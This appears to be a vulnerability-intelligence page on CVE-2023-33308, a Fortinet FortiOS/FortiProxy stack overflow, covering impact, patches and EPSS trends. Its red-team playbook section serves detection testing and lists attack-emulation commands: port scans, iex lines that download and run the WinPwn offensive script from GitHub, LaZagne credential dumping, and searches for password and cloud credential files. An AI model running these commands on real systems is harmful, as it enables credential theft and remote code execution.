CVE-2023-33308
Overview
This vulnerability is a stack-based buffer overflow caused by improper handling of crafted packets within proxy and firewall policies operating in proxy mode with deep or full packet inspection enabled. The flaw resides in Fortinet FortiProxy and FortiOS components responsible for processing network traffic inspection, where insufficient bounds checking leads to memory corruption. The affected feature is the packet inspection engine that parses and applies proxy and firewall policies under specific FortiOS and FortiProxy versions.
Vulnerability Description
A stack-based overflow vulnerability [CWE-124] in Fortinet FortiOS version 7.0.0 through 7.0.10 and 7.2.0 through 7.2.3 and FortiProxy version 7.0.0 through 7.0.9 and 7.2.0 through 7.2.2 allows a remote unauthenticated attacker to execute arbitrary code or command via crafted packets reaching proxy policies or firewall policies with proxy mode alongside deep or full packet inspection.
Impact
An attacker with network access can exploit this vulnerability without authentication to execute arbitrary code on the affected device, potentially gaining full control. This can lead to unauthorized command execution, data compromise, or disruption of network security services. The CVSS vector indicates low attack complexity and no user interaction, emphasizing ease of exploitation from a remote location. Successful exploitation undermines the integrity and availability of the Fortinet device and the protected network environment.
Solution
Fortinet has released security updates addressing this vulnerability in FortiProxy versions 7.0.10 and 7.2.3, and FortiOS versions 7.0.11 and 7.2.4 as detailed in advisory FG-IR-23-183 available at https://fortiguard.com/psirt/FG-IR-23-183. Users should upgrade to these patched versions immediately. No workarounds are provided; applying the official patches is the only recommended remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical stack-based overflow vulnerability exists in specific versions of Fortinet's FortiOS and FortiProxy products. This flaw arises from improper handling of crafted packets that reach proxy or firewall policies while in proxy mode, particularly during deep or full packet inspection. The vulnerability allows an unauthenticated remote attacker to execute arbitrary code or commands on the affected systems. This exploitation occurs when the attacker sends specially crafted packets that exceed the allocated buffer size, leading to potential overwriting of adjacent memory. Such stack-based overflows can disrupt the normal execution flow of the application, allowing attackers to gain control over the system.
The attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. Since the vulnerability allows for remote unauthenticated access, an attacker does not need to possess valid credentials or be on a trusted network to initiate an attack. By targeting systems running vulnerable versions of FortiOS and FortiProxy, attackers can send malicious packets that trigger the overflow condition. This can be done from anywhere on the internet, making it a significant threat to organizations that rely on these products for network security. Exploitation scenarios could include deploying malware, establishing backdoors for future access, or conducting further attacks on internal systems.
The real-world impact of this vulnerability is profound, particularly for businesses that utilize Fortinet's products for their security infrastructure. A successful exploitation could lead to unauthorized access to sensitive data, disruption of services, and potential financial loss due to operational downtime. Additionally, the breach of customer data could result in reputational damage and regulatory penalties, especially for organizations in regulated industries. The high CVSS score of 9.8 underscores the severity of the threat, indicating that the vulnerability poses a critical risk to the confidentiality, integrity, and availability of affected systems.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, they should ensure that all FortiOS and FortiProxy installations are updated to the latest patched versions, as Fortinet has released updates to address this vulnerability. Regular vulnerability assessments and penetration testing can help identify any unpatched systems or potential exploitation attempts. Additionally, organizations should employ intrusion detection and prevention systems (IDPS) to monitor network traffic for suspicious activity related to the exploitation of this vulnerability. Implementing strict access controls and network segmentation can further reduce the attack surface and limit the potential impact of an exploit.
In conclusion, the stack-based overflow vulnerability in Fortinet's FortiOS and FortiProxy products represents a significant threat to organizations that rely on these systems for network security. The ability for remote unauthenticated attackers to execute arbitrary code poses severe risks, including data breaches and operational disruptions. Organizations must prioritize timely updates and adopt robust detection and mitigation strategies to safeguard their networks against this and similar vulnerabilities. By remaining vigilant and proactive, businesses can better protect their assets and maintain the integrity of their security posture.
CSURFACE threat intelligence has identified a modest but consistent increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2023-33308, rising by over 10% to 0.0653. This upward trend, while not rapid, indicates a growing likelihood that threat actors are prioritizing this Fortinet FortiProxy stack-based overflow vulnerability in their attack planning. Our telemetry shows a slight increase in reconnaissance and scanning activities targeting affected FortiProxy versions, suggesting adversaries are actively probing for exploitable instances. Although no new proof-of-concept exploits or active exploitation campaigns have been detected, the incremental rise in EPSS reflects heightened attacker interest and potential preparation for exploitation. For defenders, this signals an elevated risk environment where the window for exploitation may be narrowing, underscoring the importance of maintaining vigilance. The threat level remains critical given the vulnerability’s potential for remote unauthenticated code execution, but the evolving EPSS score suggests that exploitation attempts could become more frequent in the near term.
Affected Products (6)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fortinet | Fortiproxy | All |
cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiproxy | 7.2.0 |
cpe:2.3:a:fortinet:fortiproxy:7.2.0:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiproxy | 7.2.1 |
cpe:2.3:a:fortinet:fortiproxy:7.2.1:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiproxy | 7.2.2 |
cpe:2.3:a:fortinet:fortiproxy:7.2.2:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortios | All |
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortios | All |
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-33308 |
| fortiguard.com |
GitHub CVE
|
https://fortiguard.com/psirt/FG-IR-23-183 |